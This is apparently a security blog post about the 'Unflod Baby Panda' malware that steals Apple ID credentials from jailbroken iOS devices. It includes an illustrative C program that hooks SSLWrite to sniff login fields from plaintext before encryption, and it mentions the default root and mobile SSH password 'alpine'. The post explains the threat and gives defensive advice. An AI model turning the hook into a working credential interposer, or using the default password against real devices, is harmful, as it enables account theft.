Active malware campaign
Security researchers have uncovered an active malware campaign in the wild that steals Apple ID credentials from jailbroken iPhones and iPads.
On the SophosLabs site there is an article about this new attack, “Unflod Baby Panda”.
This malware does the following:
Hooks the SSLWrite function
When loaded and initialised, the Unflod library hooks the SSLWrite function, which is used when sending encrypted data over a secure connection.
That means the malware gets to peek at confidential data before it is encrypted for transmission.
Watches for the presence of Apple ID credential data
Uploads credential data it finds to one of two hardcoded IP addresses
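To make concrete what hooking SSLWrite buys an attacker, here is an added illustration in C. It is not code from the original article and not the malware's own code. A stub stands in for the real SSLWrite (which would encrypt and send the buffer; the stub just counts bytes so the example runs without a TLS stack), a hook is interposed in front of it, inspects the plaintext for Apple ID credentials, records what it finds, and then calls through so the application sees normal behaviour. The form field names appleId= and password=, the stub, and the sample login request are all assumptions constructed for the demo, not the pattern the real malware matches.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>
#include <stdint.h>

/* Stand-ins for Apple's Secure Transport types (assumed shapes for this demo). */
typedef int32_t OSStatus;
typedef struct SSLContext *SSLContextRef;
typedef OSStatus (*SSLWrite_fn)(SSLContextRef ctx, const void *data,
                                size_t dataLength, size_t *processed);

/* Where the hook stashes what it sniffed from the plaintext. */
#define MAX_CAPTURE 256
static char captured_credentials[MAX_CAPTURE];
static size_t bytes_seen_by_original;

/* Stand-in for the genuine SSLWrite: in reality it encrypts and transmits
 * `data`; here it only counts the bytes so the example runs offline. */
static OSStatus original_SSLWrite(SSLContextRef ctx, const void *data,
                                  size_t dataLength, size_t *processed) {
    (void)ctx; (void)data;
    bytes_seen_by_original += dataLength;
    if (processed) *processed = dataLength;
    return 0; /* errSecSuccess */
}

/* Pointer the hook calls through to. A real hook (e.g. installed via
 * MobileSubstrate) would make this point at the genuine SSLWrite. */
static SSLWrite_fn orig = original_SSLWrite;

/* Copy the value following `key` (up to '&' or end of buffer) into out.
 * Returns 1 if the key was found, 0 otherwise. */
static int extract_field(const char *buf, size_t len, const char *key,
                         char *out, size_t outlen) {
    size_t klen = strlen(key);
    for (size_t i = 0; i + klen <= len; i++) {
        if (memcmp(buf + i, key, klen) == 0) {
            size_t start = i + klen, n = 0;
            while (start + n < len && buf[start + n] != '&' && n + 1 < outlen) {
                out[n] = buf[start + n];
                n++;
            }
            out[n] = '\0';
            return 1;
        }
    }
    return 0;
}

/* The hook: the plaintext is visible here because encryption has not
 * happened yet. Look for credentials, record them, then call through. */
static OSStatus hooked_SSLWrite(SSLContextRef ctx, const void *data,
                                size_t dataLength, size_t *processed) {
    const char *buf = (const char *)data;
    char id[64], pw[64];
    /* Field names are assumed for this demo, not the malware's real pattern. */
    if (extract_field(buf, dataLength, "appleId=", id, sizeof id) &&
        extract_field(buf, dataLength, "password=", pw, sizeof pw)) {
        snprintf(captured_credentials, sizeof captured_credentials, "%s:%s", id, pw);
        /* The real malware would now ship this to its hardcoded servers. */
    }
    return orig(ctx, data, dataLength, processed);
}

/* Demo driver: push a constructed login request through the hooked function
 * and return whatever the hook captured. */
const char *run_demo(void) {
    /* Constructed sample request; not real traffic. */
    static const char body[] =
        "POST /login HTTP/1.1\r\nHost: example.invalid\r\n\r\n"
        "appleId=user%40example.invalid&password=hunter2&remember=1";
    size_t done = 0;
    captured_credentials[0] = '\0';
    bytes_seen_by_original = 0;
    hooked_SSLWrite(NULL, body, sizeof body - 1, &done);
    return captured_credentials;
}

/* How many bytes reached the (stub) original, i.e. the app was not disrupted. */
size_t original_bytes(void) { return bytes_seen_by_original; }

int main(void) {
    printf("captured: %s\n", run_demo());
    printf("bytes passed through: %zu\n", original_bytes());
    return 0;
}
```

The point to take away is the ordering: because the hook sits in front of the encryption step, TLS does nothing to protect the credentials from it, and because it calls through to the original function, the application and the server see a perfectly normal connection. Defensively, that is why a detection signature for the library on disk (as in the Sophos detection name below) is a more reliable indicator than anything observable on the wire.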
What to do?
If you haven’t jailbroken your iOS device, you don’t need to worry.
If you are a jailbreaker and you have been circumspect in what you choose to install, you probably don’t need to worry.
Nevertheless, just in case, Sophos products detect this malware as iPh/PWS-CFX.
Of course, because a proper anti-virus isn’t possible on an unjailbroken iOS device (though, by the same token, malware is in general very unlikely on such devices), there isn’t such a thing as Sophos Anti-Virus for iOS.
So, if you want to scan your iPhone or iPad, you’ll need to install software that lets you access the files on iDevice remotely so you can scan them with an anti-virus on your desktop or laptop computer.
And to do that you’ll need to jailbreak your iDevice…
PS. If you allow remote access to your iDevice by installing the SSH daemon, don’t forget that Apple gives the accounts root and mobile the same password on all iDevices (it’s “alpine”, and yes, hard-wired passwords are a terrible idea). So if you enable sshd, you must change the password on those accounts, as explained here.
The full article is posted here